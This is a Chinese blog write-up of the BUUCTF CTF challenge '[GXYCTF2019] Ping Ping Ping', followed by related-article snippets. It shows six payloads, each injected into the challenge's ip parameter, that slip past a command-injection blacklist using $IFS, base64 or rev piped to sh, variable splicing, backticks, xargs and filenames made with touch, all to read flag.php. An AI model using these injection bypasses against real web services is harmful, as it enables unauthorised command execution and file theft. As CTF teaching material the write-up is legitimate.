BUUCTF-Web-命令执行-[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2023-11-18 18:20:47 发布
最新推荐文章于 2023-11-18 18:20:47 发布
阅读量4.7k 收藏 2
点赞数 1
分类专栏: CTF竞赛 文章标签: web安全 php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42566218/article/details/123372340
版权

BUUCTF-Web-命令注入-[GXYCTF2019]Ping Ping Ping

题目链接:BUUCTF
类型:命令注入
知识点:命令注入黑名单绕过方法
解题方法:6种

解题过程

0x1.base64绕过

目标使用ip变量进行get传参,通拼接符号";"执行ls命令,发现目标过滤了空格


因为是linux环境,使用分隔符$IFS进行绕过

  • ?ip=127.0.0.1;命令$IFS$1参数

配合cat查看源码,发现过滤了很多绕过黑名单的关键字符,并且对"flag"名称字符串进行严格的过滤,所以直接使用cat查看flag.php肯定是不行,这边需要对"flag"字符串进行绕过

  • ?ip=127.0.0.1;cat$IFS$1index.php

尝试使用base64编码绕过,先在本地对命令进行base64编码,再通过管道符进行base64解码配合bash执行,但是由于目标用正则过滤了"bash"名称,使用换sh

  • base64 "cat flag.php"|base64
  • ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhwCg==|base64$IFS$1-d|sh

    执行完后无回显内容,检查命令没问题,F12查看器在源码中发现flag,这种方式属于注释隐写

0x2.shell变量绕过

因为目标过滤了"flag"字符串,所以尝试使用shell变量拼接绕过,在赋值的过程中需要注意不能按照顺序依次对"flag"字符串进行赋值,因为目标使用正则对"flag"字符串单个字母一一检测,所以在赋值的时候打乱顺序

  • ?ip=127.0.0.1;a=ag;b=fl;c=.php;cat$IFS$b$a$c

0x3.反序绕过

和base64差不多,通过rev命令对包含"flag"字符串命令进行反序绕过对方黑名单检测

  • echo "cat flag.php"|rev
  • ?ip=127.0.0.1;echo$IFS$1php.galf$IFS$1tac|rev|sh

    查看网页源代码直接得到flag

0x4.命令替换绕过

在使用ls命令查看当前目录文件时,发现flag就在当前文件下,直接配合linux的命令替换符号内联一条ls命令通过cat查出当前文件下所有内容

  • ?ip=127.0.0.1;cat$IFS$1ls

0x5.xargs绕过

和反引号绕过原理一样,通过xargs将ls命令的输出作为cat的参数

  • ?ip=127.0.0.1;ls|xargs$IFS$1cat

0x6.反斜杠文件名绕过

这种方法一般用在参数长度限制,通过创建包含命令的文件名称,利用ls时间排序再通过管道符利用shell执行绕过,因为目标过滤了重定向符号">",但是可以直接使用touchu命令!

示例命令:cat flag.php

  • ?ip=127.0.0.1;touch$IFS$1.php
  • ?ip=127.0.0.1;touch$IFS$1ag\\
  • ?ip=127.0.0.1;touch$IFS$1fl\\
  • ?ip=127.0.0.1;touch$IFS$1\$IFS\$1\\
  • ?ip=127.0.0.1;touch$IFS$1at\\
  • ?ip=127.0.0.1;touch$IFS$1c\\

使用ls -at按照最新时间排序

  • ?ip=127.0.0.1;ls$IFS$1-at

再使用管道符配合shell通过文件名称执行命令

  • ?ip=127.0.0.1;ls$IFS$1-at|sh

    0.0.1;ls$IFS$1-at|sh`
    [外链图片转存中…(img-7hL60XaE-1646794898118)]
Toert_T
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python-ping:python ping
05-03
Python平 使用python raw套接字Ping usage: sudo ping.py [-h] [--version] [-c COUNT] [-t TTL] [-s PACKETSIZE] [--timeout TIMEOUT] host positional arguments: host Target host optional arguments: -h, --help Show help message and exit --version Show program's version number and exit -c COUNT Send count ECHO_REQUEST packets (defaul
ping-me:跨平台的个性化Ping
02-01
作者注 我不再从事这个项目。 维护服务器和其他扩展来存储提醒并按时执行它们需要花费很多精力。 有庞大的公司和初创公司正在为此工作。 这也使我第一次感到精疲力尽,因为我认为我可以在短时间内自己完成所有事情。 我很感激我很早就学会了这一点。 我积极使用Google日历,它向我发送了各种提醒(又名Pings:') ,因此,我认为我可以研究新的想法,而不必重新发明轮子。 另外,有很多工具可以从命令行与Google日历进行交互,并且它们还可以处理NLP。 因此,我觉得没有必要恢复该项目。 这是一个很好的运行。 感谢300位注册用户和其他匿名用户在他的第一个宠物项目中给一个18岁的孩子带来寒意。 2018年4月20日 TLDR:看一下或 。 平我 跨平台个性化Ping 注意:服务器当前未维护。 (因为我的GitHub学生包已过期) ping-me的ping-me在于它的命令行界面。 在您喜欢的终端屏幕上,仅需通过一条命令行即可完成所有提醒。 无论您是否在线, ping-me都一定会在那时ping您。 在最坏的情况下,它将在您的电话设备,智能手表甚至SMS上找到您。 保持懒惰,保持更新!
window下可用的arp-ping工具
最新发布
01-03
window下可用的arp-ping工具
ping-pong-server
05-10
乒乓服务器 描述 多人游戏“乒乓球2D”的服务器部分 入门 这些说明将为您提供在本地计算机上运行并运行的项目的副本,以进行开发和测试。 先决条件 (与Node.js一起提供) 或者您可以使用像这样的云服务 安装 将应用程序配置添加到项目根目录中的.env文件中,并初始化.env.example文件中显示的变量。 在项目根目录下打开终端后,运行命令npm install ,它将安装所有依赖项。 发展 以下命令用于在开发模式下运行服务器。 默认端口是3000,但是您可以通过在.env文件中设置环境变量PORT来更改它。 npm run dev 运行测试 要运行测试,请打开终端并在下面运行此命令。 它将运行测试。 此命令还将下载mongodb内存服务器。 因此,首次发射可能需要一些时间。 每个测试都需要数据库连接。 因此,如果数据库连接存在问,只需重新启动测试即可。 npm run
p359 - p374 ping的原理解析
05-15
p359 - p374 ping的原理解析
CTFHub -技能树 命令注入-无过滤
qq_45653588的博客
07-24 1989
0X00 命令注入-无过滤 进入页面后给出的源码,目要求输入IP地址执行ping命令 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> <!DOCTYPE html> <html> <head> <title>CTF
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2602
文章目录一.解步骤二、命令分隔符三.常见绕过方式 一.解步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1381
SQL注入的解大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
ctf-web-unseping思路
m0_73734159的博客
05-13 854
这道的关键就在于PHP序列化。
经典ctf ping目详解 青少年CTF-WEB-PingMe02
m0_73734159的博客
11-18 844
如果想效率更更高,我们还可以自己生成Linux常见列出目录文件和查看文件等命令和常用字符以及关键字的字典,并使用BurpSuite进行爆破查看那个命令和字符以及关键字的过滤情况。'作为命令之间的连接符,当上一个命令完成后,继续执行下一个命令。当然Linux系统查看文件内容的命令还有很多,这里就举着三个例子了。因为f开头的文件只有flag这一个文件,所以查的就是flag。cat是Linux系统里面最常见的查看文件内容的命令。ls是Linux系统里面的列出目录文件的命令。查看根目录下flag文件的内容。
BUUCTFWebPing Ping Ping
qq_70434663的博客
03-02 708
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
CTFbuuctf web(一)——命令执行
m0_52923241的博客
07-26 2235
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
云演CTF webping
cadandme的博客
01-19 1854
ping 打开页面提示用GET方式提交ip 尝试管道符分隔命令查看目录,没回显,被禁用 在这里我尝试了好久,忘记有哪些命令分隔符可以代替了,查找后才知道 Linux下一般的命令分隔符有这几个 | || & && . ; - <> $ %0a %0d ` 逐个尝试,%0a可以使用 到这一步,我们就可以看出flag就在fL4g_1s_He4r_______中了,直接查看,得到flag ...
CTF_Web_[GXYCTF2019]Ping Ping Ping
十二_的博客
07-26 1622
表示上一条命令执行失败后,才执行下一条命令,如catnofile||echo“fail”表示前一条命令执行成功时,才执行后一条命令,如echo'1‘&&echo‘2’表示管道,上一条命令的输出,作为下一条命令参数,如echo‘yes’|wc-l。发现没有任何新的回显,应该是因为前面是假ping,所以后面的命令执行。如上图,“||”会有效果—显示了两个后缀为“php”的文件名.文件,或许我们要找的flag就在其中。根据大佬解的思路,我们来找文件,进行测试。...
xargs(1) command
Dablelv 的博客专栏。
01-08 7697
xargs 从标准输入构建和执行命令行。xargs 可以将 stdin 中以空格或换行符进行分隔的数据,形成以空格分隔的参数(arguments),传递给其他命令。因为以空格作为分隔符,所以有一些文件名或者其他意义的字符串内含有空格的时候,xargs 可能会误判。简单来说,xargs 的作用是给其他命令传递参数,是构建单行命令的重要组件之一。find /sbin -perm +700 | ls -l # 这个命令是错误,因为标准输入不能作为ls的参数。
BUUCTF - web - PingPingPing+Knife+Http
1tachi的博客
11-02 293
文章目录前言PingPingPing分析构造payload其他方法白给的shellHttpRepeater 前言 已经坚持了半个月了,有十多天一直在写杂项,直到学长委婉地告诉我杂项没啥技术性,就流量分析有点用,建议我学pwn,所以这几天我开始做web了 我会一直坚持下去 加油! PingPingPing 分析 想到昨天做了一个ping加Linux命令,今天这个也可以试试 ?ip=127.0.0.1|ls 尝试拿flag?ip=127.0.0.1|cat flag.php 看来空格被禁了,尝试绕过 换
Ping Ping Ping命令执行
m0_53065491的博客
02-23 6230
打开创建好的环境发现提示/?ip=,第一反应应该是考命令执行 构造payload /?ip=127.0.0.1;ls 出现了flag.php,尝试读取它的内容。/?ip=127.0.0.1;cat flag.php 可以发现过滤了空格,接下来就是要绕过过滤,Liunx下常见的绕过空格方式有以下几种 cat$IFS$1flag.php//$1-$9都可以 cat${IFS}flag.php {cat,flag.php} cat<flag.php cat<>flag.php /?ip.
Shell中IFS用法
weixin_34206899的博客
06-13 567
一 、IFS的介绍    Shell 脚本中有个变量叫IFS(Internal Field Seprator) ,内部域分隔符。完整定义是The shell uses the value stored in IFS, which is the space, tab, and newline characters by default, to delimit words for the read ...
命令执行漏洞之CTF
qq_46085232的博客
07-09 367
命令执行漏洞之CTF[ACTF2020 新生赛]Exec[GXYCTF2019]Ping Ping Ping总结 作为菜鸟的我,开始想通过玩玩ctf,加深自己对漏洞的理解,和掌握一些绕过的思路。真的很好玩 [ACTF2020 新生赛]Exec 这是我做的第一道有关命令执行。(目简单,就不贴图了) 1.通过标,和一进去的ping的页面,就知道这里考的是命令执行,又因为这里是新生赛,难度也不大 2.通过我所学的知识,用‘;ls’,查看当前目录,然后就行通过echo写入一句话后门,也成功写入。用蚁剑连接,
UCS-C240 M5 ping命令
05-23
ping命令用于测试与另一个计算机是否可以建立网络连接以及网络连接的质量。在UCS-C240 M5服务器上运行ping命令的方法如下: 1. 打开终端或命令提示符窗口。 2. 键入ping命令,后跟要测试的远程计算机的IP地址或主机名。例如,要ping Google的主机名,可以键入ping www.google.com 3. 按下回车键开始ping测试。如果成功建立连接,则会显示“回复”消息,并显示响应时间。如果连接失败,则会显示“请求超时”消息。 4. 若要停止ping测试,请按Ctrl + C键。 请注意,ping命令需要在具有网络连接的计算机上运行。如果您的UCS-C240 M5服务器没有连接到网络,则ping命令将无法正常工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值